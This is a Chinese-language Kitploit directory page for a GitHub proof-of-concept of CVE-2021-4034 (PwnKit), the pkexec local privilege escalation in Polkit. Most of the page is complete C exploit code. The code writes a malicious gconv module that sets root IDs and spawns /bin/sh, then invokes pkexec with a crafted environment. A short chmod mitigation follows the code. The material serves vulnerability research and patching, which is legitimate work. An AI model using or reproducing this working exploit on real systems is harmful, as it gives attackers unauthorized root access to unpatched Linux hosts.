Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-4034 — 针对 Polkit 的 pkexec 本地权限提升漏洞(CVE-2021-4034)的概念验证漏洞利用,包含可用的漏洞利用代码及修补说明。 | Kitploit
工具/GitHubGitHub/pombredanne/cve-2021-4034
权限提升漏洞分析漏洞利用渗透测试学习与教育红队
GitHubpombredanne/cve-2021-4034

CVE-2021-4034

针对 Polkit 的 pkexec 本地权限提升漏洞(CVE-2021-4034)的概念验证漏洞利用,包含可用的漏洞利用代码及修补说明。

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-4034

Polkit 的 Pkexec CVE-2021-4034 概念验证与补丁

  • 已在完全修补的 Ubuntu 21.10 上确认
  • PoC
  • 修补

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

已在完全修补的 Ubuntu 21.10 上确认:

PoC:

root@kitploit:~
/* 编译:gcc polkit_PoC.c -o PwnKit
* 修改权限:chmod +x ./PwnKit
* 利用:./PwnKit
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

修补:

从 /usr/bin/pkexec 移除 SGID

root@kitploit:~
cd /usr/bin && sudo chmod 0755 ./pkexec
下载工具